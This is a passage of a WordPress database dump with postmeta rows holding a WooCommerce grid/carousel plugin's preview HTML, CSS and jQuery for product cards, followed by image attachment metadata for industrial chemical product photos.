!important;\r\n\r\n		}\r\n\r\n		.admin_hover_wrap .gsc_cart a {\r\n\r\n		    border: 2px solid #fff !important;\r\n\r\n		    color: #000 !important;\r\n\r\n		    text-transform: inherit !important;\r\n\r\n		    background: #fff !important;\r\n\r\n		    border-radius: 0px !important; \r\n\r\n		    font-size: 12px !important;\r\n\r\n		}\r\n\r\n		.admin_hover_wrap .gsc_cart a:hover {\r\n\r\n		    border: 2px solid #000 !important;\r\n\r\n		    color: #fff !important;\r\n\r\n		    background: #000 !important;\r\n\r\n		}\r\n\r\n		.admin_hover_wrap .twi-sale{\r\n\r\n		  background-color: #00C4BC !important;\r\n\r\n		  border-color: #00C4BC !important;\r\n\r\n		  color: #FFF !important;\r\n\r\n		}\r\n\r\n		.admin_hover_wrap .twi-out{\r\n\r\n		  background-color: #DC6868 !important;\r\n\r\n		  border-color: #DC6868 !important;\r\n\r\n		  color: #FFF !important;\r\n\r\n		}\r\n\r\n		.admin_hover_wrap .twi-fea{\r\n\r\n		  background-color: #00C4BC !important;\r\n\r\n		  border-color: #00C4BC !important;\r\n\r\n		  color: #FFF !important;\r\n\r\n		}\r\n\r\n		.admin_hover_wrap .twi-fea,.admin_hover_wrap .twi-sale {\r\n\r\n		    border-bottom-right-radius: 0px !important;\r\n\r\n		    border-top-left-radius: 0px !important;\r\n\r\n		}\r\n\r\n		.admin_hover_wrap .twi-out {\r\n\r\n		    border-top-right-radius: 0px !important;\r\n\r\n		    border-bottom-left-radius: 0px !important;\r\n\r\n		}\r\n\r\n		.admin_hover_wrap .twi-panel-teaser img{\r\n\r\n			border-top-right-radius: 0px !important;\r\n\r\n			border-top-left-radius: 0px !important;\r\n\r\n		}\r\n\r\n     </style>\r\n\r\n     <div class="gsc_js_code">\r\n\r\n	     \r\n\r\n	     jQuery(document).ready(function(){       \r\n\r\n		       jQuery(\'.pic-twi-caption\').each(function() {\r\n\r\n		         jQuery(this).hover(function(){\r\n\r\n		           jQuery( ".gsc_cart" ).addClass("animated no-animtion");\r\n\r\n		           jQuery( ".gsc_pro_title" ).addClass("animated no-animtion");\r\n\r\n		           jQuery( ".twi-price" ).addClass("animated no-animtion");\r\n\r\n		           jQuery( ".twi-rating" ).addClass("no-animtion");\r\n\r\n		         },function(){\r\n\r\n		             jQuery( ".gsc_cart" ).removeClass("animated no-animtion");\r\n\r\n		             jQuery( ".gsc_pro_title" ).removeClass("animated no-animtion");\r\n\r\n		             jQuery( ".twi-price" ).removeClass("animated no-animtion");\r\n\r\n		             jQuery( ".twi-rating" ).removeClass("no-animtion");\r\n\r\n		         });   \r\n\r\n		     });\r\n\r\n		 });\r\n\r\n	     \r\n\r\n	 </div>\r\n\r\n     <div class="admin_hover_wrap">\r\n\r\n	     <div class="pic-twi twi-overlay-hover">\r\n\r\n	            <a class="twi-ui top left attached label teal twi-sale">Sale!</a>\r\n\r\n				<a class="twi-ui top right attached label red twi-out">Out of stock</a>\r\n\r\n				<a class="twi-ui bottom right attached label teal twi-fea">Featured</a>		    \r\n\r\n				<div class="twi-panel-teaser twi-rib">\r\n\r\n				   <a href="#"><img src="https://www.miller-stephenson.com/wp-content/plugins/grid-slider-carousel-for-woocommerce/images/demo.jpg" class="twi-img-normal"></a>\r\n\r\n			    </div>\r\n\r\n			    <div class="pic-twi-caption fade">\r\n\r\n			    <div class="twi-details twi-overlay-panel twi-flex twi-flex-center twi-flex-middle twi-text-center twi-flex-column">\r\n\r\n				    <h3 class="gsc_pro_title">\r\n\r\n					    <a href="#">Product 1</a>\r\n\r\n				     </h3>\r\n\r\n				     <div class="twi-price">\r\n\r\n				     	<del><span class="amount">$120.00</span></del> \r\n\r\n				     	<ins><span class="amount">$100.00</span></ins>\r\n\r\n				     </div>\r\n\r\n				     <div class="twi-rating">\r\n\r\n				     	<i class="twi-icon-star"></i>\r\n\r\n				     	<i class="twi-icon-star"></i>\r\n\r\n				     	<i class="twi-icon-star"></i>\r\n\r\n				     	<i class="twi-icon-star-half-o"></i>\r\n\r\n				     	<i class="twi-icon-star-o"></i>\r\n\r\n			        </div>\r\n\r\n			        <div class="gsc_cart">\r\n\r\n				     	<a href="#">Add to cart</a>\r\n\r\n				    </div>\r\n\r\n			 </div>\r\n\r\n		 </div>\r\n\r\n		</div>\r\n\r\n	</div>\r\n\r\n	";s:4:"font";s:6:"Roboto";s:8:"over_eff";s:4:"fade";s:7:"img_eff";s:14:"twi-img-normal";s:6:"nor_bg";s:21:"rgba(44, 62, 80, 0.5)";s:10:"nor_border";s:1:"0";s:11:"nor_bor_col";s:4:"#eee";s:16:"nor_border_width";s:1:"0";s:6:"h3_col";s:4:"#fff";s:12:"h3_col_hover";s:4:"#000";s:12:"h3_font_size";s:2:"16";s:12:"h3_txt_trans";s:7:"inherit";s:8:"title_an";s:11:"no-animtion";s:8:"fo_color";s:4:"#fff";s:7:"fo_size";s:2:"12";s:8:"price_an";s:11:"no-animtion";s:10:"star_color";s:4:"#fff";s:5:"st_si";s:2:"12";s:9:"rating_an";s:11:"no-animtion";s:8:"cart_col";s:4:"#000";s:14:"cart_txt_trans";s:7:"inherit";s:7:"cart_bg";s:4:"#fff";s:12:"cart_fo_size";s:2:"12";s:12:"cart_bor_wid";s:1:"2";s:8:"cart_bor";s:4:"#fff";s:14:"cart_col_hover";s:4:"#fff";s:13:"cart_bg_hover";s:4:"#000";s:14:"cart_bor_hover";s:4:"#000";s:12:"cart_bor_rad";s:1:"0";s:7:"cart_an";s:11:"no-animtion";s:7:"sale_bg";s:7:"#00C4BC";s:8:"sale_txt";s:4:"#FFF";s:6:"out_bg";s:7:"#DC6868";s:7:"out_txt";s:4:"#FFF";s:5:"fe_bg";s:7:"#00C4BC";s:6:"fe_txt";s:4:"#FFF";}}s:18:"over_preview_group";a:1:{i:0;a:30:{s:17:"over_live_preview";s:3995:"	<link href=\'https://fonts.googleapis.com/css?family=Roboto:{{first}}{{first}}&subset=latin\' rel=\'stylesheet\' type=\'text/css\'>\r\n\r\n     <style>\r\n\r\n		.admin_over_wrap .twi-overlay-background{\r\n\r\n			background: rgba(44, 62, 80, 0.5) !important;\r\n\r\n			color: #fff !important;\r\n\r\n		}\r\n\r\n		.admin_over_wrap .twi-overlay{\r\n\r\n			border: 0px solid #eee;\r\n\r\n			border-radius: 0%;		\r\n\r\n		}\r\n\r\n       .admin_over_wrap .gsc_pro_title a,.admin_over_wrap .twi-panel,.gsc_cart a,.admin_over_wrap .twi-price,.admin_over_wrap .twi-sale,.admin_over_wrap .twi-fea,.admin_over_wrap .twi-out{\r\n\r\n			font-family: Roboto !important;\r\n\r\n			font-style: {{first}} !important;\r\n\r\n			font-weight: {{first}} !important;\r\n\r\n		}\r\n\r\n		.admin_over_wrap .gsc_pro_title a{\r\n\r\n			text-transform: inherit !important;\r\n\r\n			color: #fff !important;\r\n\r\n			font-size: 16px !important;\r\n\r\n		}\r\n\r\n		.admin_over_wrap .gsc_pro_title a:hover{\r\n\r\n            color: #000 !important;\r\n\r\n		}\r\n\r\n		.admin_over_wrap .twi-price{\r\n\r\n			font-size: 12px !important;\r\n\r\n			color: #fff !important;\r\n\r\n		}\r\n\r\n		.admin_over_wrap .twi-rating{\r\n\r\n            color: #fff !important;\r\n\r\n            font-size: 13px !important;\r\n\r\n		}\r\n\r\n		.admin_over_wrap .gsc_cart a {\r\n\r\n		    border: 2px solid #fff !important;\r\n\r\n		    color: #000 !important;\r\n\r\n		    text-transform: inherit !important;\r\n\r\n		    background: #fff !important;\r\n\r\n		    border-radius: 0px !important; \r\n\r\n		    font-size: 12px !important;\r\n\r\n		}\r\n\r\n		.admin_over_wrap .gsc_cart a:hover {\r\n\r\n		    border: 2px solid #000 !important;\r\n\r\n		    color: #fff !important;\r\n\r\n		    background: #000 !important;\r\n\r\n		}\r\n\r\n		.admin_over_wrap .twi-sale{\r\n\r\n		  background-color: #00C4BC !important;\r\n\r\n		  border-color: #00C4BC !important;\r\n\r\n		  color: #FFF !important;\r\n\r\n		}\r\n\r\n		.admin_over_wrap .twi-out{\r\n\r\n		  background-color: #DC6868 !important;\r\n\r\n		  border-color: #DC6868 !important;\r\n\r\n		  color: #FFF !important;\r\n\r\n		}\r\n\r\n		.admin_over_wrap .twi-fea{\r\n\r\n		  background-color: #00C4BC !important;\r\n\r\n		  border-color: #00C4BC !important;\r\n\r\n		  color: #FFF !important;\r\n\r\n		}\r\n\r\n		.admin_over_wrap .twi-fea,.admin_overver_wrap .twi-sale {\r\n\r\n		    border-bottom-right-radius: 0px !important;\r\n\r\n		    border-top-left-radius: 0px !important;\r\n\r\n		}\r\n\r\n		.admin_over_wrap .twi-out {\r\n\r\n		    border-top-right-radius: 0px !important;\r\n\r\n		    border-bottom-left-radius: 0px !important;\r\n\r\n		}\r\n\r\n		.admin_over_wrap .twi-panel-teaser img{\r\n\r\n			border-top-right-radius: 0px !important;\r\n\r\n			border-top-left-radius: 0px !important;\r\n\r\n		}\r\n\r\n     </style>\r\n\r\n     <div class="admin_over_wrap">\r\n\r\n        <figure class="twi-overlay">\r\n\r\n        	<a class="twi-ui top left attached label teal twi-sale">Sale!</a>\r\n\r\n			<a class="twi-ui top right attached label red twi-out">Out of stock</a>\r\n\r\n			<a class="twi-ui bottom right attached label teal twi-fea">Featured</a>\r\n\r\n            <a href="#"><img src="https://www.miller-stephenson.com/wp-content/plugins/grid-slider-carousel-for-woocommerce/images/demo.jpg"></a>\r\n\r\n                <figcaption class="twi-overlay-panel twi-overlay-background twi-flex twi-flex-center twi-flex-middle twi-text-center">\r\n\r\n                    <div class="gsc_pro_detail">\r\n\r\n                         <h3 class="gsc_pro_title">\r\n\r\n					        <a href="#">Product 1</a>\r\n\r\n					     </h3>\r\n\r\n					     <div class="twi-price">\r\n\r\n					     	<del><span class="amount">$120.00</span></del> \r\n\r\n					     	<ins><span class="amount">$100.00</span></ins>\r\n\r\n					     </div>\r\n\r\n					     <div class="twi-rating">\r\n\r\n					     	<i class="twi-icon-star"></i>\r\n\r\n					     	<i class="twi-icon-star"></i>\r\n\r\n					     	<i class="twi-icon-star"></i>\r\n\r\n					     	<i class="twi-icon-star-half-o"></i>\r\n\r\n					     	<i class="twi-icon-star-o"></i>\r\n\r\n				        </div>\r\n\r\n				        <div class="gsc_cart">\r\n\r\n					     	<a href="#">Add to cart</a>\r\n\r\n					    </div>\r\n\r\n                    </div>\r\n\r\n                </figcaption>\r\n\r\n        </figure>\r\n\r\n	</div>\r\n\r\n	";s:4:"font";s:6:"Roboto";s:6:"nor_bg";s:21:"rgba(44, 62, 80, 0.5)";s:10:"nor_border";s:1:"0";s:11:"nor_bor_col";s:4:"#eee";s:16:"nor_border_width";s:1:"0";s:6:"h3_col";s:4:"#fff";s:12:"h3_col_hover";s:4:"#000";s:12:"h3_font_size";s:2:"16";s:12:"h3_txt_trans";s:7:"inherit";s:8:"fo_color";s:4:"#fff";s:7:"fo_size";s:2:"12";s:10:"star_color";s:4:"#fff";s:5:"st_si";s:2:"13";s:8:"cart_col";s:4:"#000";s:14:"cart_txt_trans";s:7:"inherit";s:7:"cart_bg";s:4:"#fff";s:12:"cart_fo_size";s:2:"12";s:12:"cart_bor_wid";s:1:"2";s:8:"cart_bor";s:4:"#fff";s:14:"cart_col_hover";s:4:"#fff";s:13:"cart_bg_hover";s:4:"#000";s:14:"cart_bor_hover";s:4:"#000";s:12:"cart_bor_rad";s:1:"0";s:7:"sale_bg";s:7:"#00C4BC";s:8:"sale_txt";s:4:"#FFF";s:6:"out_bg";s:7:"#DC6868";s:7:"out_txt";s:4:"#FFF";s:5:"fe_bg";s:7:"#00C4BC";s:6:"fe_txt";s:4:"#FFF";}}}'); 
INSERT INTO `wp_postmeta` VALUES (14734, 1384, '_edit_lock', '1491587210:2'); 
INSERT INTO `wp_postmeta` VALUES (14735, 1384, '_edit_last', '2'); 
INSERT INTO `wp_postmeta` VALUES (14736, 1385, '_wp_attached_file', '2016/09/MS-555-557.pdf'); 
INSERT INTO `wp_postmeta` VALUES (14737, 1386, '_wp_attached_file', '2016/09/flux-remover.jpg'); 
INSERT INTO `wp_postmeta` VALUES (14738, 1386, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:5926;s:6:"height";i:4050;s:4:"file";s:24:"2016/09/flux-remover.jpg";s:5:"sizes";a:8:{s:9:"thumbnail";a:4:{s:4:"file";s:24:"flux-remover-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:24:"flux-remover-800x547.jpg";s:5:"width";i:800;s:6:"height";i:547;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:24:"flux-remover-768x525.jpg";s:5:"width";i:768;s:6:"height";i:525;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:26:"flux-remover-1600x1093.jpg";s:5:"width";i:1600;s:6:"height";i:1093;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:24:"flux-remover-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:24:"flux-remover-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:24:"flux-remover-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:24:"flux-remover-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"2";s:8:"quantity";d:78;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (14739, 1384, '_thumbnail_id', '1386'); 
INSERT INTO `wp_postmeta` VALUES (14740, 1387, '_wp_attached_file', '2016/09/ms-114c-conformal-coating-stripper.jpg'); 
INSERT INTO `wp_postmeta` VALUES (14741, 1387, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:5184;s:6:"height";i:3456;s:4:"file";s:46:"2016/09/ms-114c-conformal-coating-stripper.jpg";s:5:"sizes";a:8:{s:9:"thumbnail";a:4:{s:4:"file";s:46:"ms-114c-conformal-coating-stripper-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:46:"ms-114c-conformal-coating-stripper-800x533.jpg";s:5:"width";i:800;s:6:"height";i:533;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:46:"ms-114c-conformal-coating-stripper-768x512.jpg";s:5:"width";i:768;s:6:"height";i:512;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:48:"ms-114c-conformal-coating-stripper-1600x1067.jpg";s:5:"width";i:1600;s:6:"height";i:1067;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:46:"ms-114c-conformal-coating-stripper-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:46:"ms-114c-conformal-coating-stripper-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:46:"ms-114c-conformal-coating-stripper-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:46:"ms-114c-conformal-coating-stripper-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"3";s:8:"quantity";d:89;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (14742, 1388, '_wp_attached_file', '2016/09/ms-122ad-ptfe-release-agent.jpg'); 
INSERT INTO `wp_postmeta` VALUES (14743, 1388, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:5184;s:6:"height";i:3456;s:4:"file";s:39:"2016/09/ms-122ad-ptfe-release-agent.jpg";s:5:"sizes";a:8:{s:9:"thumbnail";a:4:{s:4:"file";s:39:"ms-122ad-ptfe-release-agent-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:39:"ms-122ad-ptfe-release-agent-800x533.jpg";s:5:"width";i:800;s:6:"height";i:533;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:39:"ms-122ad-ptfe-release-agent-768x512.jpg";s:5:"width";i:768;s:6:"height";i:512;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:41:"ms-122ad-ptfe-release-agent-1600x1067.jpg";s:5:"width";i:1600;s:6:"height";i:1067;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:39:"ms-122ad-ptfe-release-agent-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:39:"ms-122ad-ptfe-release-agent-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:39:"ms-122ad-ptfe-release-agent-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:39:"ms-122ad-ptfe-release-agent-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"4";s:8:"quantity";d:89;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (14744, 1389, '_wp_attached_file', '2016/09/ms-122ad-red-release-agent.jpg'); 
INSERT INTO `wp_postmeta` VALUES (14745, 1389, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:5184;s:6:"height";i:3456;s:4:"file";s:38:"2016/09/ms-122ad-red-release-agent.jpg";s:5:"sizes";a:8:{s:9:"thumbnail";a:4:{s:4:"file";s:38:"ms-122ad-red-release-agent-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:38:"ms-122ad-red-release-agent-800x533.jpg";s:5:"width";i:800;s:6:"height";i:533;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:38:"ms-122ad-red-release-agent-768x512.jpg";s:5:"width";i:768;s:6:"height";i:512;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:40:"ms-122ad-red-release-agent-1600x1067.jpg";s:5:"width";i:1600;s:6:"height";i:1067;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:38:"ms-122ad-red-release-agent-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:38:"ms-122ad-red-release-agent-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:38:"ms-122ad-red-release-agent-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:38:"ms-122ad-red-release-agent-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"4";s:8:"quantity";d:89;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (14746, 1390, '_wp_attached_file', '2016/09/ms-122av-ptfe-release-agent.jpg'); 
INSERT INTO `wp_postmeta` VALUES (14747, 1390, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:5184;s:6:"height";i:3456;s:4:"file";s:39:"2016/09/ms-122av-ptfe-release-agent.jpg";s:5:"sizes";a:8:{s:9:"thumbnail";a:4:{s:4:"file";s:39:"ms-122av-ptfe-release-agent-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:39:"ms-122av-ptfe-release-agent-800x533.jpg";s:5:"width";i:800;s:6:"height";i:533;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:39:"ms-122av-ptfe-release-agent-768x512.jpg";s:5:"width";i:768;s:6:"height";i:512;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:41:"ms-122av-ptfe-release-agent-1600x1067.jpg";s:5:"width";i:1600;s:6:"height";i:1067;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:39:"ms-122av-ptfe-release-agent-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:39:"ms-122av-ptfe-release-agent-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:39:"ms-122av-ptfe-release-agent-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:39:"ms-122av-ptfe-release-agent-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"4";s:8:"quantity";d:89;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (14748, 1391, '_wp_attached_file', '2016/09/ms-122se-ptfe-release-agent.jpg'); 
INSERT INTO `wp_postmeta` VALUES (14749, 1391, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:5184;s:6:"height";i:3456;s:4:"file";s:39:"2016/09/ms-122se-ptfe-release-agent.jpg";s:5:"sizes";a:8:{s:9:"thumbnail";a:4:{s:4:"file";s:39:"ms-122se-ptfe-release-agent-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:39:"ms-122se-ptfe-release-agent-800x533.jpg";s:5:"width";i:800;s:6:"height";i:533;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:39:"ms-122se-ptfe-release-agent-768x512.jpg";s:5:"width";i:768;s:6:"height";i:512;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:41:"ms-122se-ptfe-release-agent-1600x1067.jpg";s:5:"width";i:1600;s:6:"height";i:1067;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:39:"ms-122se-ptfe-release-agent-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:39:"ms-122se-ptfe-release-agent-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:39:"ms-122se-ptfe-release-agent-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:39:"ms-122se-ptfe-release-agent-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"5";s:8:"quantity";d:89;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (14750, 1392, '_wp_attached_file', '2016/09/ms-143ax-ptfe-release-agent.jpg'); 
INSERT INTO `wp_postmeta` VALUES (14751, 1392, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:5184;s:6:"height";i:3456;s:4:"file";s:39:"2016/09/ms-143ax-ptfe-release-agent.jpg";s:5:"sizes";a:8:{s:9:"thumbnail";a:4:{s:4:"file";s:39:"ms-143ax-ptfe-release-agent-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:39:"ms-143ax-ptfe-release-agent-800x533.jpg";s:5:"width";i:800;s:6:"height";i:533;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:39:"ms-143ax-ptfe-release-agent-768x512.jpg";s:5:"width";i:768;s:6:"height";i:512;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:41:"ms-143ax-ptfe-release-agent-1600x1067.jpg";s:5:"width";i:1600;s:6:"height";i:1067;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:39:"ms-143ax-ptfe-release-agent-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:39:"ms-143ax-ptfe-release-agent-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:39:"ms-143ax-ptfe-release-agent-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:39:"ms-143ax-ptfe-release-agent-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"3";s:8:"quantity";d:89;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (14752, 1393, '_wp_attached_file', '2016/09/ms-222l-aero-duster.jpg'); 
